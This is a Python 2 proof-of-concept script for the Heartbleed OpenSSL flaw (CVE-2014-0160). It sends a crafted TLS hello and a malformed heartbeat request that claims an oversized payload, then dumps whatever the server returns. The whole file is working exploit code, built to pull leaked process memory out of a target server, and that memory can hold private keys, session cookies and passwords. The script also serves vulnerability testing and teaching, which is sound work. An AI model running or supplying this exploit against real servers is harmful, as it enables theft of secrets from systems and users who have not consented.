heartbleed

1. #!/usr/bin/env python2
2.  
3. # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
4. # The author disclaims copyright to this source code.
5.  
6. import sys
7. import struct
8. import socket
9. import time
10. import select
11. import re
12. from optparse import OptionParser
13.  
14. options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
15. options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
16. options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
17. options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')
18.  
19. def h2bin(x):
20.     return x.replace(' ', '').replace('\n', '').decode('hex')
21.  
22. hello = h2bin('''
23. 16 03 02 00  dc 01 00 00 d8 03 02 53
24. 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
25. bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
26. 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
27. 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
28. c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
29. c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
30. c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
31. c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
32. 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
33. 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
34. 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
35. 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
36. 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
37. 00 0f 00 01 01                                  
38. ''')
39.  
40. hb = h2bin('''
41. 18 03 02 00 03
42. 01 40 00
43. ''')
44.  
45. def hexdump(s):
46.     for b in xrange(0, len(s), 16):
47.         lin = [c for c in s[b : b + 16]]
48.         hxdat = ' '.join('%02X' % ord(c) for c in lin)
49.         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
50.         print '  %04x: %-48s %s' % (b, hxdat, pdat)
51.     print
52.  
53. def recvall(s, length, timeout=5):
54.     endtime = time.time() + timeout
55.     rdata = ''
56.     remain = length
57.     while remain > 0:
58.         rtime = endtime - time.time()
59.         if rtime < 0:
60.             return None
61.         r, w, e = select.select([s], [], [], 5)
62.         if s in r:
63.             data = s.recv(remain)
64.             # EOF?
65.             if not data:
66.                 return None
67.             rdata += data
68.             remain -= len(data)
69.     return rdata
70.        
71.  
72. def recvmsg(s):
73.     hdr = recvall(s, 5)
74.     if hdr is None:
75.         print 'Unexpected EOF receiving record header - server closed connection'
76.         return None, None, None
77.     typ, ver, ln = struct.unpack('>BHH', hdr)
78.     pay = recvall(s, ln, 10)
79.     if pay is None:
80.         print 'Unexpected EOF receiving record payload - server closed connection'
81.         return None, None, None
82.     print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
83.     return typ, ver, pay
84.  
85. def hit_hb(s):
86.     s.send(hb)
87.     while True:
88.         typ, ver, pay = recvmsg(s)
89.         if typ is None:
90.             print 'No heartbeat response received, server likely not vulnerable'
91.             return False
92.  
93.         if typ == 24:
94.             print 'Received heartbeat response:'
95.             print(pay)
96.             if len(pay) > 3:
97.                 print 'WARNING: server returned more data than it should - server is vulnerable!'
98.             else:
99.                 print 'Server processed malformed heartbeat, but did not return any extra data.'
100.             return True
101.  
102.         if typ == 21:
103.             print 'Received alert:'
104.             print(pay)
105.             print 'Server returned error, likely not vulnerable'
106.             return False
107.  
108. def main():
109.     opts, args = options.parse_args()
110.     if len(args) < 1:
111.         options.print_help()
112.         return
113.  
114.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
115.     print 'Connecting...'
116.     sys.stdout.flush()
117.     s.connect((args[0], opts.port))
118.  
119.     if opts.starttls:
120.         re = s.recv(4096)
121.         if opts.debug: print re
122.         s.send('ehlo starttlstest\n')
123.         re = s.recv(1024)
124.         if opts.debug: print re
125.         if not 'STARTTLS' in re:
126.             if opts.debug: print re
127.             print 'STARTTLS not supported...'
128.             sys.exit(0)
129.         s.send('starttls\n')
130.         re = s.recv(1024)
131.    
132.     print 'Sending Client Hello...'
133.     sys.stdout.flush()
134.     s.send(hello)
135.     print 'Waiting for Server Hello...'
136.     sys.stdout.flush()
137.     while True:
138.         typ, ver, pay = recvmsg(s)
139.         if typ == None:
140.             print 'Server closed connection without sending Server Hello.'
141.             return
142.         # Look for server hello done message.
143.         if typ == 22 and ord(pay[0]) == 0x0E:
144.             break
145.  
146.     print 'Sending heartbeat request...'
147.     sys.stdout.flush()
148.     s.send(hb)
149.     hit_hb(s)
150.  
151. if __name__ == '__main__':
152.     main()